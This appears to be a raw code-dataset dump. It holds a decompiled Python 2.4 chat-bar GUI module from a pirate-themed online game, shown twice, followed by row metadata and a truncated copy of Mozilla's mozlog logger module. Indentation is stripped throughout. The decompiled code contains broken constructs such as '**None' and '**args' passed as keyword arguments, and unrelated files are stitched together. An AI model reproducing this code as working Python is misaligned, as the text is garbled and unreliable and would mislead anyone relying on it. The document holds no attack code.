from pirates.piratesgui.TabBar import TopTab, TabBar
class ChatTab(TopTab):
def __init__(self, tabBar, name, text_xyz = None, **kw):
optiondefs = (('modelName', 'general_frame_c', None), ('frameSize', (0, 0.22, 0.0, 0.10000000000000001), None), ('borderScale', 0.13500000000000001, None), ('bgBuffer', 0.14000000000000001, None), ('label', '', None), ('textMayChange', 1, None))
self.defineoptions(kw, optiondefs)
TopTab.__init__(self, tabBar, name, **None)
self.initialiseoptions(ChatTab)
text_pos = (0.11700000000000001, 0.040000000000000001, 0)
if text_xyz:
text_pos = text_xyz
self.myTextScale = PiratesGuiGlobals.TextScaleLarge * 1.1000000000000001
self.myLabel = DirectLabel(parent = self, relief = None, state = DGG.DISABLED, text = self['label'], text_scale = self.myTextScale, text_align = TextNode.ACenter, text_fg = PiratesGuiGlobals.TextFG1, text_shadow = PiratesGuiGlobals.TextShadow, text_pos = text_pos, text_font = PiratesGlobals.getInterfaceFont(), textMayChange = 1)
def destroy(self):
self.myLabel = None
TopTab.destroy(self)
def setBoxWidth(self, percentage):
iPercentage = 1.0 / percentage
self.myLabel['text_scale'] = (self.myTextScale * iPercentage, self.myTextScale, self.myTextScale)
class ChatTabBar(TabBar):
def refreshTabs(self):
for (x, name) in enumerate(self.tabOrder):
tab = self.tabs[name]
tab.setPos(0.070000000000000007 + 0.19500000000000001 * (x + self.offset), 0, 0.059999999999999998)
tab.reparentTo(self.bParent)
for name in reversed(self.tabOrder):
tab = self.tabs[name]
tab.reparentTo(self.bParent)
self.activeIndex = max(0, min(self.activeIndex, len(self.tabOrder) - 1))
if len(self.tabOrder):
name = self.tabOrder[self.activeIndex]
tab = self.tabs[name]
tab.reparentTo(self.fParent)
tab.setZ(0.076999999999999999)
def makeTab(self, name, **kw):
return ChatTab(self, name, **None)
def stash(self):
TabBar.stash(self)
def setBoxWidth(self, percentage):
for key in self.tabs:
self.tabs[key].setBoxWidth(percentage)
class WhisperTab(TopTab):
def __init__(self, tabBar, name, **kw):
optiondefs = (('modelName', 'general_frame_c', None), ('frameSize', (0, 0.745, 0.0, 0.11), None), ('borderScale', 0.13500000000000001, None), ('bgBuffer', 0.14000000000000001, None))
self.defineoptions(kw, optiondefs)
TopTab.__init__(self, tabBar, name, **None)
self.initialiseoptions(ChatTab)
class WhisperTabBar(TabBar):
def refreshTabs(self):
for (x, name) in enumerate(self.tabOrder):
tab = self.tabs[name]
tab.setPos(0.070000000000000007 + 0.71999999999999997 * (x + self.offset), 0, 0.059999999999999998)
tab.reparentTo(self.bParent)
for name in reversed(self.tabOrder):
tab = self.tabs[name]
tab.reparentTo(self.bParent)
self.activeIndex = max(0, min(self.activeIndex, len(self.tabOrder) - 1))
if len(self.tabOrder):
name = self.tabOrder[self.activeIndex]
tab = self.tabs[name]
tab.reparentTo(self.fParent)
tab.setZ(0.076999999999999999)
def makeTab(self, name, **kw):
newWhisperTab = WhisperTab(self, name, **None)
if hasattr(self, 'percentage'):
newWhisperTab.setBoxWidth(self.percentage)
return newWhisperTab
class ChatBar(DirectFrame, FSM):
def __init__(self, parent, chatMgr, whiteListEntry, *args, **kw):
optiondefs = (('relief', None, None), ('state', DGG.DISABLED, None), ('frameSize', (0, 1, 0, 0.75), None), ('frameColor', (1, 0, 1, 0.20000000000000001), None))
self.defineoptions(kw, optiondefs)
DirectFrame.__init__(self, parent, *args, **args)
self.initialiseoptions(ChatBar)
FSM.__init__(self, 'ChatBar')
if base.config.GetBool('whitelist-chat-enabled', 1):
pass
self.whiteListEnabled = base.cr.accountDetailRecord.WLChatEnabled
self.openChatEnabled = base.cr.accountDetailRecord.canOpenChatAndNotGetBooted()
if not self.whiteListEnabled:
pass
self.noChat = not (self.openChatEnabled)
self.chatTabs = None
self.whisperTabs = None
self.chatMgr = chatMgr
self.slideIval = None
self.whisperNameLabel = None
self.whisperPrefixLabel = None
self.percentage = 1.0
self.iPercentage = 1.0
self.myTextScale = PiratesGuiGlobals.TextScaleLarge * 1.1000000000000001
self.setupGui(whiteListEntry)
self.request('Hidden')
def destroy(self):
self.cleanup()
self.stopSlideIval()
DirectFrame.destroy(self)
self.cleanupGui()
self.chatMgr = None
def setBoxWidth(self, percentage):
iPercentage = 1.0 / percentage
self.setScale(percentage, 1.0, 1.0)
self.chatTabs.setBoxWidth(percentage)
self.speedButton.setScale(iPercentage, 1.0, 1.0)
self.emoteButton.setScale(iPercentage, 1.0, 1.0)
self.startChatButton.setScale(iPercentage, 1.0, 1.0)
self.percentage = percentage
self.iPercentage = iPercentage
if self.whisperNameLabel:
self.whisperNameLabel['text_scale'] = (self.myTextScale * iPercentage, self.myTextScale, self.myTextScale)
self.whisperNameLabel['text_pos'] = (0.20999999999999999 * self.iPercentage, 0.040000000000000001, 0)
if self.whisperPrefixLabel:
self.whisperPrefixLabel['text_scale'] = (self.myTextScale * iPercentage, self.myTextScale, self.myTextScale)
def setupGui(self, whiteListEntry):
self.stopSlideIval()
if self.chatTabs:
self.chatTabs.destroy()
if self.whisperTabs:
self.whisperTabs.destroy()
self.removeChildren()
gui = loader.loadModel('models/gui/chat_frame_b')
skullbg = loader.loadModel('models/gui/chat_frame_a')
skullbg2 = loader.loadModel('models/gui/chat_frame_a')
skullgui = loader.loadModel('models/gui/chat_frame_skull')
emoteGfxbg = loader.loadModel('models/gui/chat_frame_a')
icons = loader.loadModel('models/gui/toplevel_gui')
charGui = loader.loadModel('models/gui/char_gui')
scale = Vec3(0.20000000000000001, 1.0, 0.20000000000000001)
offset = (0.5, 0, 0.38)
speedChatBg = self.attachNewNode('speedChatBg')
skullbg.find('**/pPlane11').reparentTo(speedChatBg)
speedChatBg.setScale(scale)
speedChatBg.setPos(*offset)
speedChatBg.flattenStrong()
emoteBg = self.attachNewNode('emoteBg')
skullbg2.find('**/pPlane11').reparentTo(emoteBg)
emoteBg.setScale(scale)
emoteBg.setPos(0.59099999999999997, 0, 0.38)
emoteBg.flattenStrong()
self.chatEntryBackground = self.attachNewNode('chatEntryBackground')
self.chatEntryBackground.setX(-0.90000000000000002)
self.backTabParent = self.chatEntryBackground.attachNewNode('backTabs')
textEntryGeom = self.chatEntryBackground.attachNewNode('textEntryBg')
gui.find('**/pPlane12').reparentTo(textEntryGeom)
textEntryGeom.setScale(scale)
textEntryGeom.setPos(*offset)
textEntryGeom.flattenStrong()
self.chatEntryVisNode = textEntryGeom.attachNewNode('chatEntryVis')
self.chatEntryVisNode.hide()
self.chatEntryVisNode.setAlphaScale(0)
whiteListEntry.reparentTo(self.chatEntryVisNode)
if self.noChat:
def noshow():
pass
whiteListEntry.show = noshow
whiteListEntry.hide()
else:
whiteListEntry.setPos(0.20000000000000001, 0, 0.035999999999999997)
self.frontTabParent = self.chatEntryBackground.attachNewNode('frontTab', sort = 2)
self.speedButton = DirectButton(parent = self, relief = None, frameSize = (-0.055, 0.044999999999999998, -0.055, 0.044999999999999998), geom = (icons.find('**/chat_bubble_icon'), icons.find('**/chat_bubble_icon'), icons.find('**/chat_bubble_icon_over')), geom_scale = 0.25, pos = (0.14000000000000001, 0, 0.044999999999999998), rolloverSound = None, command = self.chatMgr.activateSpeedChat)
self.emoteButton = DirectButton(parent = self, relief = None, frameSize = (-0.055, 0.044999999999999998, -0.055, 0.044999999999999998), geom = (charGui.find('**/*head'), charGui.find('**/*head'), charGui.find('**/*head_over')), geom_scale = 0.29999999999999999, pos = (0.049000000000000002, 0, 0.044999999999999998), rolloverSound = None, command = self.chatMgr.activateEmoteChat)
tGui = loader.loadModel('models/gui/triangle')
triangle = (tGui.find('**/triangle'), tGui.find('**/triangle_down'), tGui.find('**/triangle_over'))
self.startChatButton = DirectButton(parent = self, relief = None, image = triangle, image_scale = 0.065000000000000002, pos = (0.23100000000000001, 0.0, 0.050000000000000003), rolloverSound = None, command = self.chatMgr.activateChat)
self.chatTabs = ChatTabBar(parent = self, backParent = self.backTabParent, frontParent = self.frontTabParent)
allTab = self.chatTabs.addTab('All', label = PLocalizer.ChatTabAll, command = self.chatMgr.activateChat, extraArgs = [
'All'])
crewTab = self.chatTabs.addTab('Crew', label = PLocalizer.ChatTabCrew, command = self.chatMgr.activateChat, extraArgs = [
'Crew'])
guildTab = self.chatTabs.addTab('Guild', label = PLocalizer.ChatTabGuild, command = self.chatMgr.activateChat, extraArgs = [
'Guild'])
shipPVPTab = self.chatTabs.addTab('ShipPVP', label = PLocalizer.ChatTabShipPVP, command = self.chatMgr.activateChat, frameSize = (0, 0.23999999999999999, 0.0, 0.10000000000000001), textMayChange = 1, extraArgs = [
'ShipPVP'])
self.chatTabs.stash()
self.whisperTabs = WhisperTabBar(parent = self, backParent = self.backTabParent, frontParent = self.frontTabParent)
whisperNameTab = self.whisperTabs.addTab('Name')
whisperCancelTab = self.whisperTabs.addTab('Cancel', command = self.whisperCanceled)
self.whisperTabs.stash()
whisperCancelTab['frameSize'] = (0, 0.105, 0.0, 0.11)
self.whisperPrefixLabel = DirectLabel(parent = whisperNameTab, relief = None, state = DGG.DISABLED, text = PLocalizer.ProfilePageWhisper + ':', text_scale = (self.myTextScale * self.iPercentage, self.myTextScale, self.myTextScale), text_align = TextNode.ALeft, text_fg = PiratesGuiGlobals.TextFG1, text_shadow = PiratesGuiGlobals.TextShadow, text_pos = (0.033000000000000002, 0.040000000000000001, 0), text_font = PiratesGlobals.getInterfaceFont())
DirectLabel(parent = whisperCancelTab, relief = None, state = DGG.DISABLED, text = 'X', text_scale = (self.myTextScale * 1.1799999999999999, self.myTextScale * 1.1799999999999999, self.myTextScale * 1.1799999999999999), text_align = TextNode.ACenter, text_fg = PiratesGuiGlobals.TextFG1, text_shadow = PiratesGuiGlobals.TextShadow, text_pos = (0.052999999999999999, 0.042999999999999997, 0), text_font = PiratesGlobals.getInterfaceFont())
self.whisperTabs.stash()
self.request('Hidden')
def cleanupGui(self):
self.whisperPrefixLabel = None
self.chatEntryBackground = None
self.backTabParent = None
self.frontTabParent = None
self.speedButton = None
self.emoteButton = None
self.startChatButton = None
if self.chatTabs:
self.chatTabs.destroy()
self.chatTabs = None
if self.whisperTabs:
self.whisperTabs.destroy()
self.whisperTabs = None
def whisperCanceled(self):
self.chatMgr.whisperCanceled()
def refreshTabStates(self):
if self.getCurrentOrNextState() not in ('Off', 'Hidden', 'Whisper'):
if not self.chatMgr.crewChatAllowed:
self.chatTabs.getTab('Crew').stash()
else:
self.chatTabs.getTab('Crew').unstash()
if not self.chatMgr.guildChatAllowed:
self.chatTabs.getTab('Guild').stash()
else:
self.chatTabs.getTab('Guild').unstash()
if not self.chatMgr.shipPVPChatAllowed:
self.chatTabs.getTab('ShipPVP').stash()
else:
self.chatTabs.getTab('ShipPVP').unstash()
def stopSlideIval(self):
if self.slideIval and self.slideIval.isPlaying():
self.slideIval.pause()
def enterHidden(self):
self.stopSlideIval()
self.slideIval = Sequence(Func(self.chatEntryVisNode.setAlphaScale, 0), Func(self.chatEntryVisNode.hide), self.chatEntryBackground.posInterval(0.25, Point3(-0.90000000000000002, 0, 0), blendType = 'easeIn'), Func(self.startChatButton.show), Func(self.chatEntryBackground.hide))
self.slideIval.start()
def exitHidden(self):
self.stopSlideIval()
self.slideIval = Sequence(Func(self.chatEntryVisNode.show), Func(self.chatEntryBackground.show), Func(self.startChatButton.hide), self.chatEntryBackground.posInterval(0.25, Point3(0, 0, 0), blendType = 'easeOut'), Func(self.chatEntryVisNode.setAlphaScale, 1))
self.slideIval.start()
def enterAll(self):
self.chatTabs.unstash()
self.whisperTabs.stash()
self.chatTabs.selectTab('All')
self.refreshTabStates()
def exitAll(self):
pass
def enterCrew(self):
self.chatTabs.unstash()
self.whisperTabs.stash()
self.chatTabs.selectTab('Crew')
self.refreshTabStates()
def exitCrew(self):
pass
def enterGuild(self):
self.chatTabs.unstash()
self.whisperTabs.stash()
self.chatTabs.selectTab('Guild')
self.refreshTabStates()
def enterShipPVP(self):
self.chatTabs.unstash()
self.whisperTabs.stash()
self.chatTabs.selectTab('ShipPVP')
self.refreshTabStates()
def exitShipPVP(self):
pass
def exitGuild(self):
pass
def enterWhisper(self, avatarName = '<NAME>', whisperId = 0):
self.whisperName = avatarName
self.whisperId = whisperId
self.chatTabs.stash()
self.whisperTabs.unstash()
if self.whisperNameLabel:
self.whisperNameLabel.destroy()
self.whisperNameLabel = DirectLabel(parent = self.whisperTabs.getTab('Name'), relief = None, state = DGG.DISABLED, text = avatarName, text_scale = (self.myTextScale * self.iPercentage, self.myTextScale, self.myTextScale), text_align = TextNode.ALeft, text_fg = PiratesGuiGlobals.TextFG2, text_shadow = PiratesGuiGlobals.TextShadow, text_pos = (0.20999999999999999 * self.iPercentage, 0.040000000000000001, 0), text_font = PiratesGlobals.getInterfaceFont())
def exitWhisper(self):
self.whisperName = ''
self.whisperId = 0
if self.whisperNameLabel and 0:
self.whisperNameLabel.destroy()
self.whisperNameLabel = None
| # File: C (Python 2.4)
from direct.gui.DirectGui import *
from direct.interval.IntervalGlobal import *
from direct.fsm.FSM import FSM
from direct.showbase.PythonUtil import Functor
from pandac.PandaModules import *
from pirates.piratesbase import PiratesGlobals
from pirates.piratesbase import PLocalizer
from pirates.piratesgui import PiratesGuiGlobals
from pirates.piratesgui.TabBar import TopTab, TabBar
class ChatTab(TopTab):
def __init__(self, tabBar, name, text_xyz = None, **kw):
optiondefs = (('modelName', 'general_frame_c', None), ('frameSize', (0, 0.22, 0.0, 0.10000000000000001), None), ('borderScale', 0.13500000000000001, None), ('bgBuffer', 0.14000000000000001, None), ('label', '', None), ('textMayChange', 1, None))
self.defineoptions(kw, optiondefs)
TopTab.__init__(self, tabBar, name, **None)
self.initialiseoptions(ChatTab)
text_pos = (0.11700000000000001, 0.040000000000000001, 0)
if text_xyz:
text_pos = text_xyz
self.myTextScale = PiratesGuiGlobals.TextScaleLarge * 1.1000000000000001
self.myLabel = DirectLabel(parent = self, relief = None, state = DGG.DISABLED, text = self['label'], text_scale = self.myTextScale, text_align = TextNode.ACenter, text_fg = PiratesGuiGlobals.TextFG1, text_shadow = PiratesGuiGlobals.TextShadow, text_pos = text_pos, text_font = PiratesGlobals.getInterfaceFont(), textMayChange = 1)
def destroy(self):
self.myLabel = None
TopTab.destroy(self)
def setBoxWidth(self, percentage):
iPercentage = 1.0 / percentage
self.myLabel['text_scale'] = (self.myTextScale * iPercentage, self.myTextScale, self.myTextScale)
class ChatTabBar(TabBar):
def refreshTabs(self):
for (x, name) in enumerate(self.tabOrder):
tab = self.tabs[name]
tab.setPos(0.070000000000000007 + 0.19500000000000001 * (x + self.offset), 0, 0.059999999999999998)
tab.reparentTo(self.bParent)
for name in reversed(self.tabOrder):
tab = self.tabs[name]
tab.reparentTo(self.bParent)
self.activeIndex = max(0, min(self.activeIndex, len(self.tabOrder) - 1))
if len(self.tabOrder):
name = self.tabOrder[self.activeIndex]
tab = self.tabs[name]
tab.reparentTo(self.fParent)
tab.setZ(0.076999999999999999)
def makeTab(self, name, **kw):
return ChatTab(self, name, **None)
def stash(self):
TabBar.stash(self)
def setBoxWidth(self, percentage):
for key in self.tabs:
self.tabs[key].setBoxWidth(percentage)
class WhisperTab(TopTab):
def __init__(self, tabBar, name, **kw):
optiondefs = (('modelName', 'general_frame_c', None), ('frameSize', (0, 0.745, 0.0, 0.11), None), ('borderScale', 0.13500000000000001, None), ('bgBuffer', 0.14000000000000001, None))
self.defineoptions(kw, optiondefs)
TopTab.__init__(self, tabBar, name, **None)
self.initialiseoptions(ChatTab)
class WhisperTabBar(TabBar):
def refreshTabs(self):
for (x, name) in enumerate(self.tabOrder):
tab = self.tabs[name]
tab.setPos(0.070000000000000007 + 0.71999999999999997 * (x + self.offset), 0, 0.059999999999999998)
tab.reparentTo(self.bParent)
for name in reversed(self.tabOrder):
tab = self.tabs[name]
tab.reparentTo(self.bParent)
self.activeIndex = max(0, min(self.activeIndex, len(self.tabOrder) - 1))
if len(self.tabOrder):
name = self.tabOrder[self.activeIndex]
tab = self.tabs[name]
tab.reparentTo(self.fParent)
tab.setZ(0.076999999999999999)
def makeTab(self, name, **kw):
newWhisperTab = WhisperTab(self, name, **None)
if hasattr(self, 'percentage'):
newWhisperTab.setBoxWidth(self.percentage)
return newWhisperTab
class ChatBar(DirectFrame, FSM):
def __init__(self, parent, chatMgr, whiteListEntry, *args, **kw):
optiondefs = (('relief', None, None), ('state', DGG.DISABLED, None), ('frameSize', (0, 1, 0, 0.75), None), ('frameColor', (1, 0, 1, 0.20000000000000001), None))
self.defineoptions(kw, optiondefs)
DirectFrame.__init__(self, parent, *args, **args)
self.initialiseoptions(ChatBar)
FSM.__init__(self, 'ChatBar')
if base.config.GetBool('whitelist-chat-enabled', 1):
pass
self.whiteListEnabled = base.cr.accountDetailRecord.WLChatEnabled
self.openChatEnabled = base.cr.accountDetailRecord.canOpenChatAndNotGetBooted()
if not self.whiteListEnabled:
pass
self.noChat = not (self.openChatEnabled)
self.chatTabs = None
self.whisperTabs = None
self.chatMgr = chatMgr
self.slideIval = None
self.whisperNameLabel = None
self.whisperPrefixLabel = None
self.percentage = 1.0
self.iPercentage = 1.0
self.myTextScale = PiratesGuiGlobals.TextScaleLarge * 1.1000000000000001
self.setupGui(whiteListEntry)
self.request('Hidden')
def destroy(self):
self.cleanup()
self.stopSlideIval()
DirectFrame.destroy(self)
self.cleanupGui()
self.chatMgr = None
def setBoxWidth(self, percentage):
iPercentage = 1.0 / percentage
self.setScale(percentage, 1.0, 1.0)
self.chatTabs.setBoxWidth(percentage)
self.speedButton.setScale(iPercentage, 1.0, 1.0)
self.emoteButton.setScale(iPercentage, 1.0, 1.0)
self.startChatButton.setScale(iPercentage, 1.0, 1.0)
self.percentage = percentage
self.iPercentage = iPercentage
if self.whisperNameLabel:
self.whisperNameLabel['text_scale'] = (self.myTextScale * iPercentage, self.myTextScale, self.myTextScale)
self.whisperNameLabel['text_pos'] = (0.20999999999999999 * self.iPercentage, 0.040000000000000001, 0)
if self.whisperPrefixLabel:
self.whisperPrefixLabel['text_scale'] = (self.myTextScale * iPercentage, self.myTextScale, self.myTextScale)
def setupGui(self, whiteListEntry):
self.stopSlideIval()
if self.chatTabs:
self.chatTabs.destroy()
if self.whisperTabs:
self.whisperTabs.destroy()
self.removeChildren()
gui = loader.loadModel('models/gui/chat_frame_b')
skullbg = loader.loadModel('models/gui/chat_frame_a')
skullbg2 = loader.loadModel('models/gui/chat_frame_a')
skullgui = loader.loadModel('models/gui/chat_frame_skull')
emoteGfxbg = loader.loadModel('models/gui/chat_frame_a')
icons = loader.loadModel('models/gui/toplevel_gui')
charGui = loader.loadModel('models/gui/char_gui')
scale = Vec3(0.20000000000000001, 1.0, 0.20000000000000001)
offset = (0.5, 0, 0.38)
speedChatBg = self.attachNewNode('speedChatBg')
skullbg.find('**/pPlane11').reparentTo(speedChatBg)
speedChatBg.setScale(scale)
speedChatBg.setPos(*offset)
speedChatBg.flattenStrong()
emoteBg = self.attachNewNode('emoteBg')
skullbg2.find('**/pPlane11').reparentTo(emoteBg)
emoteBg.setScale(scale)
emoteBg.setPos(0.59099999999999997, 0, 0.38)
emoteBg.flattenStrong()
self.chatEntryBackground = self.attachNewNode('chatEntryBackground')
self.chatEntryBackground.setX(-0.90000000000000002)
self.backTabParent = self.chatEntryBackground.attachNewNode('backTabs')
textEntryGeom = self.chatEntryBackground.attachNewNode('textEntryBg')
gui.find('**/pPlane12').reparentTo(textEntryGeom)
textEntryGeom.setScale(scale)
textEntryGeom.setPos(*offset)
textEntryGeom.flattenStrong()
self.chatEntryVisNode = textEntryGeom.attachNewNode('chatEntryVis')
self.chatEntryVisNode.hide()
self.chatEntryVisNode.setAlphaScale(0)
whiteListEntry.reparentTo(self.chatEntryVisNode)
if self.noChat:
def noshow():
pass
whiteListEntry.show = noshow
whiteListEntry.hide()
else:
whiteListEntry.setPos(0.20000000000000001, 0, 0.035999999999999997)
self.frontTabParent = self.chatEntryBackground.attachNewNode('frontTab', sort = 2)
self.speedButton = DirectButton(parent = self, relief = None, frameSize = (-0.055, 0.044999999999999998, -0.055, 0.044999999999999998), geom = (icons.find('**/chat_bubble_icon'), icons.find('**/chat_bubble_icon'), icons.find('**/chat_bubble_icon_over')), geom_scale = 0.25, pos = (0.14000000000000001, 0, 0.044999999999999998), rolloverSound = None, command = self.chatMgr.activateSpeedChat)
self.emoteButton = DirectButton(parent = self, relief = None, frameSize = (-0.055, 0.044999999999999998, -0.055, 0.044999999999999998), geom = (charGui.find('**/*head'), charGui.find('**/*head'), charGui.find('**/*head_over')), geom_scale = 0.29999999999999999, pos = (0.049000000000000002, 0, 0.044999999999999998), rolloverSound = None, command = self.chatMgr.activateEmoteChat)
tGui = loader.loadModel('models/gui/triangle')
triangle = (tGui.find('**/triangle'), tGui.find('**/triangle_down'), tGui.find('**/triangle_over'))
self.startChatButton = DirectButton(parent = self, relief = None, image = triangle, image_scale = 0.065000000000000002, pos = (0.23100000000000001, 0.0, 0.050000000000000003), rolloverSound = None, command = self.chatMgr.activateChat)
self.chatTabs = ChatTabBar(parent = self, backParent = self.backTabParent, frontParent = self.frontTabParent)
allTab = self.chatTabs.addTab('All', label = PLocalizer.ChatTabAll, command = self.chatMgr.activateChat, extraArgs = [
'All'])
crewTab = self.chatTabs.addTab('Crew', label = PLocalizer.ChatTabCrew, command = self.chatMgr.activateChat, extraArgs = [
'Crew'])
guildTab = self.chatTabs.addTab('Guild', label = PLocalizer.ChatTabGuild, command = self.chatMgr.activateChat, extraArgs = [
'Guild'])
shipPVPTab = self.chatTabs.addTab('ShipPVP', label = PLocalizer.ChatTabShipPVP, command = self.chatMgr.activateChat, frameSize = (0, 0.23999999999999999, 0.0, 0.10000000000000001), textMayChange = 1, extraArgs = [
'ShipPVP'])
self.chatTabs.stash()
self.whisperTabs = WhisperTabBar(parent = self, backParent = self.backTabParent, frontParent = self.frontTabParent)
whisperNameTab = self.whisperTabs.addTab('Name')
whisperCancelTab = self.whisperTabs.addTab('Cancel', command = self.whisperCanceled)
self.whisperTabs.stash()
whisperCancelTab['frameSize'] = (0, 0.105, 0.0, 0.11)
self.whisperPrefixLabel = DirectLabel(parent = whisperNameTab, relief = None, state = DGG.DISABLED, text = PLocalizer.ProfilePageWhisper + ':', text_scale = (self.myTextScale * self.iPercentage, self.myTextScale, self.myTextScale), text_align = TextNode.ALeft, text_fg = PiratesGuiGlobals.TextFG1, text_shadow = PiratesGuiGlobals.TextShadow, text_pos = (0.033000000000000002, 0.040000000000000001, 0), text_font = PiratesGlobals.getInterfaceFont())
DirectLabel(parent = whisperCancelTab, relief = None, state = DGG.DISABLED, text = 'X', text_scale = (self.myTextScale * 1.1799999999999999, self.myTextScale * 1.1799999999999999, self.myTextScale * 1.1799999999999999), text_align = TextNode.ACenter, text_fg = PiratesGuiGlobals.TextFG1, text_shadow = PiratesGuiGlobals.TextShadow, text_pos = (0.052999999999999999, 0.042999999999999997, 0), text_font = PiratesGlobals.getInterfaceFont())
self.whisperTabs.stash()
self.request('Hidden')
def cleanupGui(self):
self.whisperPrefixLabel = None
self.chatEntryBackground = None
self.backTabParent = None
self.frontTabParent = None
self.speedButton = None
self.emoteButton = None
self.startChatButton = None
if self.chatTabs:
self.chatTabs.destroy()
self.chatTabs = None
if self.whisperTabs:
self.whisperTabs.destroy()
self.whisperTabs = None
def whisperCanceled(self):
self.chatMgr.whisperCanceled()
def refreshTabStates(self):
if self.getCurrentOrNextState() not in ('Off', 'Hidden', 'Whisper'):
if not self.chatMgr.crewChatAllowed:
self.chatTabs.getTab('Crew').stash()
else:
self.chatTabs.getTab('Crew').unstash()
if not self.chatMgr.guildChatAllowed:
self.chatTabs.getTab('Guild').stash()
else:
self.chatTabs.getTab('Guild').unstash()
if not self.chatMgr.shipPVPChatAllowed:
self.chatTabs.getTab('ShipPVP').stash()
else:
self.chatTabs.getTab('ShipPVP').unstash()
def stopSlideIval(self):
if self.slideIval and self.slideIval.isPlaying():
self.slideIval.pause()
def enterHidden(self):
self.stopSlideIval()
self.slideIval = Sequence(Func(self.chatEntryVisNode.setAlphaScale, 0), Func(self.chatEntryVisNode.hide), self.chatEntryBackground.posInterval(0.25, Point3(-0.90000000000000002, 0, 0), blendType = 'easeIn'), Func(self.startChatButton.show), Func(self.chatEntryBackground.hide))
self.slideIval.start()
def exitHidden(self):
self.stopSlideIval()
self.slideIval = Sequence(Func(self.chatEntryVisNode.show), Func(self.chatEntryBackground.show), Func(self.startChatButton.hide), self.chatEntryBackground.posInterval(0.25, Point3(0, 0, 0), blendType = 'easeOut'), Func(self.chatEntryVisNode.setAlphaScale, 1))
self.slideIval.start()
def enterAll(self):
self.chatTabs.unstash()
self.whisperTabs.stash()
self.chatTabs.selectTab('All')
self.refreshTabStates()
def exitAll(self):
pass
def enterCrew(self):
self.chatTabs.unstash()
self.whisperTabs.stash()
self.chatTabs.selectTab('Crew')
self.refreshTabStates()
def exitCrew(self):
pass
def enterGuild(self):
self.chatTabs.unstash()
self.whisperTabs.stash()
self.chatTabs.selectTab('Guild')
self.refreshTabStates()
def enterShipPVP(self):
self.chatTabs.unstash()
self.whisperTabs.stash()
self.chatTabs.selectTab('ShipPVP')
self.refreshTabStates()
def exitShipPVP(self):
pass
def exitGuild(self):
pass
def enterWhisper(self, avatarName = '<NAME>', whisperId = 0):
self.whisperName = avatarName
self.whisperId = whisperId
self.chatTabs.stash()
self.whisperTabs.unstash()
if self.whisperNameLabel:
self.whisperNameLabel.destroy()
self.whisperNameLabel = DirectLabel(parent = self.whisperTabs.getTab('Name'), relief = None, state = DGG.DISABLED, text = avatarName, text_scale = (self.myTextScale * self.iPercentage, self.myTextScale, self.myTextScale), text_align = TextNode.ALeft, text_fg = PiratesGuiGlobals.TextFG2, text_shadow = PiratesGuiGlobals.TextShadow, text_pos = (0.20999999999999999 * self.iPercentage, 0.040000000000000001, 0), text_font = PiratesGlobals.getInterfaceFont())
def exitWhisper(self):
self.whisperName = ''
self.whisperId = 0
if self.whisperNameLabel and 0:
self.whisperNameLabel.destroy()
self.whisperNameLabel = None
| en | 0.641047 | # File: C (Python 2.4) | 1.869808 | 2 |
mozmill-env/python/Lib/site-packages/mozlog/logger.py | lucashmorais/x-Bench | 0 | 9172 | <filename>mozmill-env/python/Lib/site-packages/mozlog/logger.py<gh_stars>0
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
from logging import getLogger as getSysLogger
from logging import *
# Some of the build slave environments don't see the following when doing
# 'from logging import *'
# see https://bugzilla.mozilla.org/show_bug.cgi?id=700415#c35
from logging import getLoggerClass, addLevelName, setLoggerClass, shutdown, debug, info, basicConfig
import json
_default_level = INFO
_LoggerClass = getLoggerClass()
# Define mozlog specific log levels
START = _default_level + 1
END = _default_level + 2
PASS = _default_level + 3
KNOWN_FAIL = _default_level + 4
FAIL = _default_level + 5
CRASH = _default_level + 6
# Define associated text of log levels
addLevelName(START, 'TEST-START')
addLevelName(END, 'TEST-END')
addLevelName(PASS, 'TEST-PASS')
addLevelName(KNOWN_FAIL, 'TEST-KNOWN-FAIL')
addLevelName(FAIL, 'TEST-UNEXPECTED-FAIL')
addLevelName(CRASH, 'PROCESS-CRASH')
class MozLogger(_LoggerClass):
"""
MozLogger class which adds some convenience log levels
related to automated testing in Mozilla and ability to
output structured log messages.
"""
def testStart(self, message, *args, **kwargs):
"""Logs a test start message"""
self.log(START, message, *args, **kwargs)
def testEnd(self, message, *args, **kwargs):
"""Logs a test end message"""
self.log(END, message, *args, **kwargs)
def testPass(self, message, *args, **kwargs):
"""Logs a test pass message"""
self.log(PASS, message, *args, **kwargs)
def testFail(self, message, *args, **kwargs):
"""Logs a test fail message"""
self.log(FAIL, message, *args, **kwargs)
def testKnownFail(self, message, *args, **kwargs):
"""Logs a test known fail message"""
self.log(KNOWN_FAIL, message, *args, **kwargs)
def processCrash(self, message, *args, **kwargs):
"""Logs a process crash message"""
self.log(CRASH, message, *args, **kwargs)
def log_structured(self, action, params=None):
"""Logs a structured message object."""
if params is None:
params = {}
level = params.get('_level', _default_level)
if isinstance(level, int):
params['_level'] = getLevelName(level)
else:
params['_level'] = level
level = getLevelName(level.upper())
# If the logger is fed a level number unknown to the logging
# module, getLevelName will return a string. Unfortunately,
# the logging module will raise a type error elsewhere if
# the level is not an integer.
if not isinstance(level, int):
level = _default_level
params['action'] = action
# The can message be None. This is expected, and shouldn't cause
# unstructured formatters to fail.
message = params.get('_message')
self.log(level, message, extra={'params': params})
class JSONFormatter(Formatter):
"""Log formatter for emitting structured JSON entries."""
def format(self, record):
# Default values determined by logger metadata
output = {
'_time': int(round(record.created * 1000, 0)),
'_namespace': record.name,
'_level': getLevelName(record.levelno),
}
# If this message was created by a call to log_structured,
# anything specified by the caller's params should act as
# an override.
output.update(getattr(record, 'params', {}))
if record.msg and output.get('_message') is None:
# For compatibility with callers using the printf like
# API exposed by python logging, call the default formatter.
output['_message'] = Formatter.format(self, record)
return json.dumps(output, indent=output.get('indent'))
class MozFormatter(Formatter):
"""
MozFormatter class used to standardize formatting
If a different format is desired, this can be explicitly
overriden with the log handler's setFormatter() method
"""
level_length = 0
max_level_length = len('TEST-START')
def __init__(self, include_timestamp=False):
"""
Formatter.__init__ has fmt and datefmt parameters that won't have
any affect on a MozFormatter instance.
:param include_timestamp: if True, include formatted time at the
beginning of the message
"""
self.include_timestamp = include_timestamp
Formatter.__init__(self)
def format(self, record):
# Handles padding so record levels align nicely
if len(record.levelname) > self.level_length:
pad = 0
if len(record.levelname) <= self.max_level_length:
self.level_length = len(record.levelname)
else:
pad = self.level_length - len(record.levelname) + 1
sep = '|'.rjust(pad)
fmt = '%(name)s %(levelname)s ' + sep + ' %(message)s'
if self.include_timestamp:
